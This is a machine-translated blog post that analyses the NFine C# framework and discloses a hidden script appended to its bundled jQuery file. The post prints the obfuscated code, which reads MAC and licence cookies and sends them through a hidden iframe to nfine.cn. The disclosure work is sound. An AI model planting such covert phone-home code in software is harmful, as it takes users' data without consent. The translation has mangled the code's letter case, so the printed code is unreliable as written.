Recently in the blog Park wandering around, found a big God released a C # framework, a look at the framework, called the frame, ah, installed B effect is very good, the interface is very cool, although there are many components are not perfect, but, can be initially applied to the project.
First look at the interface:
At the time of testing, when testing with a browser, a problem is found that the program will proactively send some information to the background. The information is as follows:
1, Http://www.nfine.cn:8099/NFineWatch/signalr/hubs
2, http://www.nfine.cn:8099/nfinewatch/signalr/negotiate?clientprotocol=1.5&userid=95b81fa6-710d-8d03-788a- 880d01c68865&connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d&_=1477271227181
3, http://www.nfine.cn:8099/nfinewatch/signalr/connect?transport=serversentevents&clientprotocol=1.5& userid=95b81fa6-710d-8d03-788a-880d01c68865&connectiontoken=b5z%2bxauoquji6auxi93wacrs2lvi3u0bwp7xs1h% 2b6rylqfckspzofnlox59huhux6s6tsrotdax8ewu99r7qh90bisk7snqmfc8zeogijjhfggss%2fzf%2fz9ioxhkbbgks& Connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d&tid=0
4, http://www.nfine.cn:8099/nfinewatch/signalr/start?transport=serversentevents&clientprotocol=1.5& userid=95b81fa6-710d-8d03-788a-880d01c68865&connectiontoken=b5z%2bxauoquji6auxi93wacrs2lvi3u0bwp7xs1h% 2b6rylqfckspzofnlox59huhux6s6tsrotdax8ewu99r7qh90bisk7snqmfc8zeogijjhfggss%2fzf%2fz9ioxhkbbgks& connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d&_=1477271227278
5, http://www.nfine.cn:8099/nfinewatch/signalr/send?transport=serversentevents&clientprotocol=1.5& userid=95b81fa6-710d-8d03-788a-880d01c68865&connectiontoken=b5z%2bxauoquji6auxi93wacrs2lvi3u0bwp7xs1h% 2b6rylqfckspzofnlox59huhux6s6tsrotdax8ewu99r7qh90bisk7snqmfc8zeogijjhfggss%2fzf%2fz9ioxhkbbgks& connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d
Then, through this information, it can be determined that the program is not authorized to use.
However, the means of encryption through the full text lookup and search find, there is no result, and then a guess, since the plaintext is not found, it can only be explained when the encryption.
Then open the browser debugging function, a catch, found to be with SIGNALR in and server communication, if it is the same as signalr to communicate with the server, that is, the JS code, mainly in jquery after,
<link href= "~/content/css/framework-font.css" rel= "stylesheet"/>
<link href= "~/content/css/framework-login.css" rel= "stylesheet"/>
<script src= "~/content/js/jquery/jquery-2.1.1.min.js" ></script>
<script src= "~/content/js/cookie/jquery.cookie.js" ></script>
<script src= "~/content/js/md5/jquery.md5.js" ></script>
A look, jquery after the file is very few, so the first is to open jquery this file for review, and then guess the general back-end development will rarely go to change jque intermediate files, general change is at the end, and then open notepad++ to view, jump directly to the end, found the following code:
(function($) {$.ABCD={getcookie:function(a) {varB, C =NewRegExp ("(^|)" + A + "= ([^;] *)(;|$)");if(b = Document.cookie.match (c)) {returnUnescape (b[2])}Else{return NULL}}, execute:function () { Try { if(Top.$.wdversion = =undefined) {top.$.wdversion= "0.0.0.0.0.1"; varA = $.abcd.getcookie ("Dfine_mac");varb = $.abcd.getcookie ("dfine_licence");varc = decodeuricomponent (Window.atob ("ahr0cdovl3d3dy5uzmluzs5jbjo4mdk5l05gaw5lv2f0y2gvmjaxnja4mdeuahrtba=="));varD = Window.atob ("awzyyw1lanmwmdawmq==");varf = decodeuricomponent (Window.atob (" jtndawzyyw1ljtiwawqlm0qlmjjpznjhbwvqczawmdaxjtiyjtiwjtiwc3r5bgulm0qlmjjkaxnwbgf5jtnbbm9uzsuymiuymcuzrsuzqy9pznjhbwulm0u ="));varg = "";if(Top.$ ("#" + D). Length <= 0) {top.$ ("body"). Append (f); Window.settimeout (function() {Top.$.wdkey = {userkey:b, macs:a};if(Top.$.wdkey! = undefined) {g = Window.btoa (Json.stringify (Top.$.wdkey))}; top.$ ("#" + D). attr ("src", C + "? =" + G)}, 6000) } } } Catch(e) {}}, init:function() {$.abcd.execute ()}}; $(function() {$.abcd.init ()})}) (jQuery);
A look, incredibly we can not understand, and then, guess is this piece of code.
Then write a simple test program to verify:
function test () { var c = decodeuricomponent (Window.atob (" ahr0cdovl3d3dy5uzmluzs5jbjo4mdk5l05gaw5lv2f0y2gvmjaxnja4mdeuahrtba== ")); var d = Window.atob ("awzyyw1lanmwmdawmq=="); var f = decodeuricomponent (Window.atob (" jtndawzyyw1ljtiwawqlm0qlmjjpznjhbwvqczawmdaxjtiyjtiwjtiwc3r5bgulm0qlmjjkaxnwbgf5jtnbbm9uzsuymiuymcuzrsuzqy9pznjhbwulm0u =")); Console.log (c); Console.log (d); Console.log (f); }
Browser output: One look is it.
The code of the people, to keep the residual fragrance (Http://http://www.nfine.cn/)
Experience Address: (official website) http://www.nfine.cn/, (modified) www.yuechifan.net
Finally, thank you very much for their contribution to open source.
A great god C # Framework for the background send information search and crack